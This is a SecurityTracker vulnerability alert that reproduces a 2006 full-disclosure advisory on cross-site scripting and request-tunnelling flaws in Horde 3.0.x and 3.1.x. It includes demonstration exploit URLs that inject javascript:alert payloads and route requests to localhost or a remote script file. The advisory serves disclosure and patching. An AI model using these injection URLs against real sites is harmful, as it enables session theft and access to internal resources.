Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Horde Application Framework Input Validation Hole Permits Cross-Site Scripting Attacks
|
|
SecurityTracker Alert ID: 1016442
|
|
SecurityTracker URL: http://securitytracker.com/id?1016442
|
|
CVE Reference: CVE-2006-3548
, CVE-2006-3549
(Links to External Site)
|
Updated: Aug 7 2008
|
Original Entry Date: Jul 6 2006
|
Impact: Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
|
Fix Available: Yes
Exploit Included: Yes
Vendor Confirmed: Yes
|
Version(s): 3.0.0 - 3.0.10, 3.1.0, 3.1.1
|
Description: A vulnerability was reported in Horde Application Framework. A remote user can conduct cross-site scripting attacks.
Several scripts do not properly filter HTML code from user-supplied input before displaying the input. A remote user can create
a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's
browser. The code will originate from the site running the Horde Application Framework software and will run in the security context
of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any,
associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site
acting as the target user.
The URL redirection (dereferrer) function is affected. A demonstration exploit URL is provided:
[Base_URI]/services/go.php?url=http://./;URL=javascript:alert(0);
The help function is affected. A demonstration exploit URL
is provided:
[Base_URI]/services/help/?show=about&module=%3Cmeta%20http-equiv=%22refresh%22%20content=%220;URL=javascript:alert(0)%3B%22%3E
The
problem reporting function is affected. A demonstration exploit URL is provided:
[Base_URI]/services/problem.php?name=%22%3E%3Cscript%3Ealert(0)%3B%3C/script%20x=%22
A remote user can tunnel HTTP GET requests through the application and inject arbitrary HTML code into the output generated by
the application. Some demonstration exploit URLs are provided:
[Base_URI]/horde/services/go.php?untrusted=1&url=http://moritz-naumann.com/
[Base_URI]/horde/service
s/go.php?untrusted=1&url=http://localhost/server-status
[Base_URI]/horde/services/go.php?untrusted=1&url=http://moritz-naumann.com/logger/xss.html
The
vendor was notified on June 6, 2006.
Moritz Naumann IT Consulting & Services reported this vulnerability.
The original advisory
is available at:
http://moritz-naumann.com/adv/0011/hordemulti/0011.txt
|
Impact: A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the
Horde Application Framework software, access data recently submitted by the target user via web form to the site, or take actions
on the site acting as the target user.
|
Solution: The vendor has issued fixed versions (3.0.11, 3.1.2).
The vendor's release announcements are available at:
http://lists.horde.org/archives/announce/2006/000287.html
http://lists.horde.org/archives/announce/2006/000288.html
|
Vendor URL: www.horde.org/horde/ (Links to External Site)
|
Cause: Input validation error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Reported By: security@moritz-naumann.com
|
Message History:
None.
|
Source Message Contents
|
Date: Wed, 05 Jul 2006 23:43:30 +0200
From: security@moritz-naumann.com
Subject: [Full-disclosure] Public Advisory: Horde 3.1.1,
|
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
SA0011
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++ Horde 3.1.1, 3.0.10 Multiple Security Issues +++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
PUBLISHED ON
July 05, 2006
PUBLISHED AT
http://moritz-naumann.com/adv/0011/hordemulti/0011.txt
http://moritz-naumann.com/adv/0011/hordemulti/0011.txt.gpg
PUBLISHED BY
Moritz Naumann IT Consulting & Services
Hamburg, Germany
http://moritz-naumann.com/
SECURITY at MORITZ hyphon NAUMANN d0t COM
GPG key: http://moritz-naumann.com/keys/0x277F060C.asc
AFFECTED APPLICATION OR SERVICE
Horde Application Framework
http://www.horde.org
The Horde Framework is a common code-base used by Horde
applications, including libraries and a common user interface.
The best known Horde application to date is probably IMP, a webbased
IMAP/SMTP client.
AFFECTED VERSIONS
Version 3.0.0 up to and including 3.0.10
Version 3.1.0 up to and including 3.1.1
Versions below 3.0.0 have not been examined.
ISSUES
Horde is subject to multiple security vulnerabilities, ranging from
information disclosure to client side script injection (cross site
scripting) issues.
+++++ 1. Cross Site Scripting #1
Horde is subject to a client side script injection vulnerability in
the URL redirection (dereferrer) function.
By accessing the following (partial) URI on a web site running an
affected version with a web browser which is prone to this issue,
client side script code will be injected into the output generated
by the application:
[Base_URI]/services/go.php?url=http://./;URL=javascript:alert(0);
This problem is caused by insufficient validation of user supplied
input. It is only known to be exploitable on Internet Explorer 6
(tested on v6.2900.2180 including all patches on Windows XP SP2).
Internet Explorer 7 beta 3 is not affected.
+++++ 2. Cross Site Scripting #2
Horde is subject to a client side script injection vulnerability in
the help function.
By accessing the following (partial) URI on a web site running a
vulnerable version with a web browser which is prone to this issue,
client side script code will be injected into the output generated
by the application:
[Base_URI]/services/help/?show=about&module=%3Cmeta%20http-equiv=%22refresh%22%20content=%220;URL
=javascript:alert(0)%3B%22%3E
This problem is caused by insufficient validation of user supplied
input. All common modern browsers providing Javascript support are
assumed to be prone to this issue.
+++++ 3. Cross Site Scripting #3
Horde is subject to a client side script injection
vulnerability in the problem reporting function.
By accessing the following (partial) URI on a web site running a
vulnerable version with a web browser which is prone to this issue,
client side script code will be injected into the output generated
by the application:
[Base_URI]/services/problem.php?name=%22%3E%3Cscript%3Ealert(0)%3B%3C/script%20x=%22
This problem is caused by insufficient validation of user supplied
input. All common modern browsers providing Javascript support are
assumed to be prone to this issue.
+++++ 4. Cross Site Scripting #4, Web tunneling behaviour
Horde is subject to a server side issue which allows to tunnel HTTP
GET requests through the application and to inject remotely hosted
web script into the output generated by the application.
This behaviour allows for accessing arbitrary locations which are
addressable using URIs starting with 'http://','https://' or
'ftp://' protocol handlers. These locations will be accessible from
within the security context of the web server running an affected
version of the application. As a result, an attacker may be able to
access remote locations s/he would not have otherwise access to,
without disclosing the real source of the request [1]. Additionally,
insufficiently access restricted local (server-side) or remote (3rd
party) locations may become available [2].
By tricking a victim into starting a tunnelling call to a previously
prepared malicious HTML file, stored in a remote location, which
contains web script which may be executed on the client side, it is
possible to extend this into a script injection issue. The injected
script would be executed by the client within the context of the
domain the vulnerable web application is hosted in. [3] All common
modern browsers providing Javascript support are assumed to be prone
to this issue.
By accessing the following (partial) URIs on a web site running a
vulnerable version with a web browser, the behaviours described
above may be triggered:
[1]
[Base_URI]/horde/services/go.php?untrusted=1&url=http://moritz-naumann.com/
[2]
[Base_URI]/horde/services/go.php?untrusted=1&url=http://localhost/server-status
[3]
[Base_URI]/horde/services/go.php?untrusted=1&url=http://moritz-naumann.com/logger/xss.html
BACKGROUND
Cross Site Scripting (XSS):
Cross Site Scripting, also known as XSS or CSS, describes
the injection of malicious content into output produced
by a web application. A common attack vector is the
inclusion of arbitrary client side script code into the
applications' output. Failure to completely sanitize user
input from malicious content can cause a web application
to be vulnerable to Cross Site Scripting.
http://www.owasp.org/index.php/Cross_Site_Scripting
http://en.wikipedia.org/wiki/XSS
http://www.cgisecurity.net/articles/xss-faq.shtml
WORKAROUNDS
Issues 1-3:
Client: Disable Javascript.
Server: Prevent access to vulnerable file(s).
Issues 1-3:
Client: Use application as intended only.
Server: Prevent access to vulnerable file(s).
SOLUTIONS
The Horde project has released versions 3.1.2 and 3.1.11 today.
These are supposed to fix all of the above issues. The updated
packages are available at http://horde.org/
TIMELINE
Jun 06, 2006 Issues 1-4: Discovery, code maintainer notification
Jun 06, 2006 Issues 1-4: Code maintainer acknowledgement
Jul 05, 2006 Issues 1-4: Code maintainer provides fix publicly
Jul 05, 2005 Issues 1-4: Public advisory
NOTES
This is not related to CVE-2006-2195.
REFERENCES
Developers' release announcements
v3.1.2: http://lists.horde.org/archives/announce/2006/000288.html
v3.0.11: http://lists.horde.org/archives/announce/2006/000287.html
ADDITIONAL CREDIT
N/A
LICENSE
Creative Commons Attribution-ShareAlike License Germany
http://creativecommons.org/licenses/by-sa/2.0/de/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (GNU/Linux)
iD8DBQFErDKBn6GkvSd/BgwRAlF7AJ4kjEsFBc2LXp4TgtxQ82OyUK4nBACfZy/U
31jDwhWrNKdtHXmsdcM1bAk=
=ENdh
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
|
|
Go to the Top of This SecurityTracker Archive Page
|
